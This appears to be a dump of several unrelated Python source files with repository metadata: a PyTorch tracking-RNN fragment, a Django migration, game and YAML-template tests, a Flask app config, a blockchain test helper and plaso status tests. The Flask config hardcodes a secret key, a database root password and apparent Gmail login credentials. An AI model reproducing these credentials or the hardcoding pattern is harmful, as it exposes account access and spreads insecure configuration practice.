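        # halves are the hidden and cell parts; the three hidden halves of
        # s2, s1 and b1 are concatenated into a (1, 3 * hidden_size) cell
        # input, matching input_size in __init__. `state` is the previous GRU
        # hidden state or the previous LSTM (h, c) pair, depending on
        # Tracking_With_GRU.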
s1, s2 = stack[-1], stack[-2]
b1 = buffer_[0]
s2h, s2c = s2.chunk(2)
s1h, s1c = s1.chunk(2)
b1h, b1c = b1.chunk(2)
cell_input = (torch.cat([s2h, s1h, b1h])).view(1, -1)
# state1, state2 = state
if Tracking_With_GRU:
tracking_h = self.gru(cell_input, state)
tracking_out = tracking_h.view(1, -1)
else:
tracking_h, tracking_c = self.rnn(cell_input, state)
tracking_out = tracking_h.view(1, -1), tracking_c.view(1, -1)
return tracking_out
| 34.717391
| 74
| 0.625548
|
a3507320e0aedd17169703e354f16d6c202cd9c1
| 2,144
|
py
|
Python
|
symposion/speakers/migrations/0001_initial.py
|
jasongrout/conf_site
|
6b3beb21de8d847cba65dcb6da84464b40739d48
|
[
"MIT"
] | 13
|
2015-05-22T17:10:22.000Z
|
2021-07-15T16:45:19.000Z
|
symposion/speakers/migrations/0001_initial.py
|
jasongrout/conf_site
|
6b3beb21de8d847cba65dcb6da84464b40739d48
|
[
"MIT"
] | 758
|
2015-03-18T13:39:25.000Z
|
2022-03-31T13:14:09.000Z
|
symposion/speakers/migrations/0001_initial.py
|
jasongrout/conf_site
|
6b3beb21de8d847cba65dcb6da84464b40739d48
|
[
"MIT"
] | 16
|
2015-03-24T18:53:17.000Z
|
2020-10-22T21:30:02.000Z
|
# Generated by Django 2.0.13 on 2019-02-17 18:43
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Speaker',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(help_text='As you would like it to appear in the conference program.', max_length=100, verbose_name='Name')),
('biography', models.TextField(blank=True, help_text="A little bit about you. Edit using <a href='http://warpedvisions.org/projects/markdown-cheat-sheet/' target='_blank'>Markdown</a>.", verbose_name='Biography')),
('biography_html', models.TextField(blank=True)),
('photo', models.ImageField(blank=True, help_text='Maximum file size: 10 MB', upload_to='speaker_photos', verbose_name='Photo')),
('twitter_username', models.CharField(blank=True, help_text='Your Twitter account', max_length=15)),
('annotation', models.TextField(blank=True, verbose_name='Annotation')),
('invite_email', models.CharField(blank=True, db_index=True, default='', max_length=200, verbose_name='Invite_email')),
('invite_token', models.CharField(blank=True, db_index=True, max_length=40, verbose_name='Invite token')),
('created', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='Created')),
('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='speaker_profile', to=settings.AUTH_USER_MODEL, verbose_name='User')),
],
options={
'verbose_name': 'Speaker',
'ordering': ['name'],
'verbose_name_plural': 'Speakers',
},
),
]
| 53.6
| 231
| 0.649254
|
0408dee6e55e879e4ceb8ddd990f71f9ee55d965
| 815
|
py
|
Python
|
mtraintester.py
|
trevor-wieland/MTrainAI
|
47bab3bf3af9e5426a822a7d14586f1798674cd7
|
[
"MIT"
] | null | null | null |
mtraintester.py
|
trevor-wieland/MTrainAI
|
47bab3bf3af9e5426a822a7d14586f1798674cd7
|
[
"MIT"
] | null | null | null |
mtraintester.py
|
trevor-wieland/MTrainAI
|
47bab3bf3af9e5426a822a7d14586f1798674cd7
|
[
"MIT"
] | null | null | null |
import mtrain
import neuraltrainer
import mtrainsimulator
if __name__ == "__main__":
"""
    Main testing function; call the other functions from here to easily test
    each part of the program.
"""
#results = mtrainsimulator.simulate_games(num_games=100, debug=False)
#results = mtrainsimulator.simulate_games(debug=False, collect_data=False, num_games=100, file_name="PlayData/data4_12_250")
#results = neuraltrainer.train_neural_net(num_players=4, domino_size=12, file_name="PlayData/data4_12_250", debug=True)
results = mtrain.mexicantrain(num_players=4, domino_size=12, data_collection=False,
debug=False, modes=["Random", "Greedy", "Probability", "Neural"],
file_name="PlayData/data4_12_250")
print(results)
| 50.9375
| 128
| 0.694479
|
4bb72ff7ff3a05e6817bddee70fb8b1ef2e762bd
| 886
|
py
|
Python
|
tests/test_flavortown.py
|
jbek7/emrichen
|
b6b8327e35cb2b9f3da49519110ecc766a9ad741
|
[
"MIT"
] | null | null | null |
tests/test_flavortown.py
|
jbek7/emrichen
|
b6b8327e35cb2b9f3da49519110ecc766a9ad741
|
[
"MIT"
] | null | null | null |
tests/test_flavortown.py
|
jbek7/emrichen
|
b6b8327e35cb2b9f3da49519110ecc766a9ad741
|
[
"MIT"
] | null | null | null |
from emrichen import Template, Context
FLAVORTOWN_YAML = """
flavours: !Loop
as: a
template: !Merge
- flavour_name: !Void
available: true
- !If
test: !IsString,Lookup a
then:
flavour_name: !Lookup a
else:
!Lookup a
over:
- peasoup
- hard liquor
- flavour_name: manifold
available: false
- John
"""
FLAVORTOWN_RESULT = {
"flavours": [
{
"available": True,
"flavour_name": "peasoup"
},
{
"available": True,
"flavour_name": "hard liquor"
},
{
"available": False,
"flavour_name": "manifold"
},
{
"available": True,
"flavour_name": "John"
}
]
}
def test_flavortown():
assert Template.parse(FLAVORTOWN_YAML).enrich(Context()) == [FLAVORTOWN_RESULT]
| 18.851064
| 83
| 0.514673
|
cf9018861b57ec91283cd68d30087fafafcebe09
| 754
|
py
|
Python
|
webstore/__init__.py
|
quoctann/demowebstore
|
48edfa359ba01d8ea64a673fbcb4e0f84a6bd41f
|
[
"CC-BY-4.0"
] | null | null | null |
webstore/__init__.py
|
quoctann/demowebstore
|
48edfa359ba01d8ea64a673fbcb4e0f84a6bd41f
|
[
"CC-BY-4.0"
] | null | null | null |
webstore/__init__.py
|
quoctann/demowebstore
|
48edfa359ba01d8ea64a673fbcb4e0f84a6bd41f
|
[
"CC-BY-4.0"
] | null | null | null |
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_mail import Mail
app = Flask(__name__)
# Configuration of MySQL Server
app.secret_key = "qou3rhkjsafbi327y12$U@$JK@BKANOEIDQ"
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:P%40ssw0rd@localhost/phonestoredb?charset=utf8'  # '@' in the password must be URL-encoded as %40
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
# Configuration of Mail Server
app.config['MAIL_SERVER'] = 'smtp.gmail.com'
app.config['MAIL_PORT'] = 587
app.config['MAIL_USERNAME'] = 'emailverifywebapp@gmail.com'
app.config['MAIL_PASSWORD'] = 'quoctan123'
app.config['MAIL_USE_TLS'] = True
app.config['MAIL_USE_SSL'] = False
db = SQLAlchemy(app=app)
login = LoginManager(app=app)
mail = Mail(app=app)
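# Hedged usage sketch (not part of the original module): how the `login` and
# `mail` objects configured above are typically wired up. `User` and the
# webstore.models import are hypothetical here; flask_login expects a
# user_loader callback, and flask_mail sends through the SMTP settings above.
from flask_mail import Message
@login.user_loader
def load_user(user_id):
    from webstore.models import User  # hypothetical models module
    return User.query.get(int(user_id))
def send_verification_email(recipient, code):
    msg = Message('Verify your account',
                  sender=app.config['MAIL_USERNAME'],
                  recipients=[recipient],
                  body='Your verification code: ' + code)
    mail.send(msg)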
| 34.272727
| 107
| 0.785146
|
26e0ec62ff1c3357075e2c847954d2786dc5c564
| 1,057
|
py
|
Python
|
test/functional/create_cache.py
|
reeccoin/REEC
|
eb388d692aa7039dfe78247c829e4d348ff1f631
|
[
"MIT"
] | 2
|
2020-11-28T13:09:16.000Z
|
2020-12-05T21:01:07.000Z
|
test/functional/create_cache.py
|
reeccoin/REEC
|
eb388d692aa7039dfe78247c829e4d348ff1f631
|
[
"MIT"
] | null | null | null |
test/functional/create_cache.py
|
reeccoin/REEC
|
eb388d692aa7039dfe78247c829e4d348ff1f631
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2016-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Create a blockchain cache.
Creating a cache of the blockchain speeds up test execution when running
multiple functional tests. This helper script is executed by test_runner when multiple
tests are being run in parallel.
"""
from test_framework.test_framework import ReeccoinTestFramework
class CreateCache(ReeccoinTestFramework):
# Test network and test nodes are not required:
def setup_chain(self):
self.log.info("Initializing test directory " + self.options.tmpdir)
# Initialize PoS chain (it will automatically generate PoW chain too)
self._initialize_chain(toPosPhase=True)
def set_test_params(self):
self.num_nodes = 0
self.supports_cli = True
def setup_network(self):
pass
def run_test(self):
pass
if __name__ == '__main__':
CreateCache().main()
| 32.030303
| 86
| 0.735099
|
34713b61e430153c9a33d296c9ca375b24d928fa
| 3,837
|
py
|
Python
|
tests/engine/processing_status.py
|
pyllyukko/plaso
|
7533db2d1035ca71d264d6281ebd5db2d073c587
|
[
"Apache-2.0"
] | 2
|
2019-10-23T03:37:59.000Z
|
2020-08-14T17:09:26.000Z
|
tests/engine/processing_status.py
|
pyllyukko/plaso
|
7533db2d1035ca71d264d6281ebd5db2d073c587
|
[
"Apache-2.0"
] | null | null | null |
tests/engine/processing_status.py
|
pyllyukko/plaso
|
7533db2d1035ca71d264d6281ebd5db2d073c587
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests the processing status."""
import unittest
from plaso.engine import processing_status
class ProcessStatusTest(unittest.TestCase):
"""Tests the process status."""
  def testUpdateNumberOfWarnings(self):
"""Tests the UpdateNumberOfWarnings function."""
process_status = processing_status.ProcessStatus()
process_status.UpdateNumberOfWarnings(5, 5)
with self.assertRaises(ValueError):
process_status.UpdateNumberOfWarnings(1, 10)
with self.assertRaises(ValueError):
process_status.UpdateNumberOfWarnings(10, 1)
def testUpdateNumberOfEventReports(self):
"""Tests the UpdateNumberOfEventReports function."""
process_status = processing_status.ProcessStatus()
process_status.UpdateNumberOfEventReports(5, 5)
with self.assertRaises(ValueError):
process_status.UpdateNumberOfEventReports(1, 10)
with self.assertRaises(ValueError):
process_status.UpdateNumberOfEventReports(10, 1)
def testUpdateNumberOfEvents(self):
"""Tests the UpdateNumberOfEvents function."""
process_status = processing_status.ProcessStatus()
process_status.UpdateNumberOfEvents(5, 5)
with self.assertRaises(ValueError):
process_status.UpdateNumberOfEvents(1, 10)
with self.assertRaises(ValueError):
process_status.UpdateNumberOfEvents(10, 1)
def testUpdateNumberOfEventSources(self):
"""Tests the UpdateNumberOfEventSources function."""
process_status = processing_status.ProcessStatus()
process_status.UpdateNumberOfEventSources(5, 5)
with self.assertRaises(ValueError):
process_status.UpdateNumberOfEventSources(1, 10)
with self.assertRaises(ValueError):
process_status.UpdateNumberOfEventSources(10, 1)
def testUpdateNumberOfEventTags(self):
"""Tests the UpdateNumberOfEventTags function."""
process_status = processing_status.ProcessStatus()
process_status.UpdateNumberOfEventTags(5, 5)
with self.assertRaises(ValueError):
process_status.UpdateNumberOfEventTags(1, 10)
with self.assertRaises(ValueError):
process_status.UpdateNumberOfEventTags(10, 1)
class ProcessingStatusTest(unittest.TestCase):
"""Tests the processing status."""
# pylint: disable=protected-access
def testWorkersStatus(self):
"""Tests the workers_status property."""
status = processing_status.ProcessingStatus()
self.assertEqual(status.workers_status, [])
def testUpdateProcessStatus(self):
"""Tests the _UpdateProcessStatus function."""
process_status = processing_status.ProcessStatus()
status = processing_status.ProcessingStatus()
status._UpdateProcessStatus(
process_status, 'test', 'Idle', 12345, 2000000, 'test process',
0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
def testUpdateForemanStatus(self):
"""Tests the UpdateForemanStatus function."""
status = processing_status.ProcessingStatus()
status.UpdateForemanStatus(
'test', 'Idle', 12345, 2000000, 'test process',
0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
def testUpdateTasksStatus(self):
"""Tests the UpdateTasksStatus function."""
task_status = processing_status.TasksStatus()
status = processing_status.ProcessingStatus()
status.UpdateTasksStatus(task_status)
def testUpdateWorkerStatus(self):
"""Tests the UpdateWorkerStatus function."""
status = processing_status.ProcessingStatus()
status.UpdateWorkerStatus(
'test', 'Idle', 12345, 2000000, 'test process', 0,
0, 0, 0, 0, 0, 0, 0, 0, 0)
class TasksStatusTest(unittest.TestCase):
"""Tests the task status."""
def testInitialization(self):
"""Tests the __init__ function."""
task_status = processing_status.TasksStatus()
self.assertIsNotNone(task_status)
if __name__ == '__main__':
unittest.main()
| 30.452381
| 71
| 0.732864
|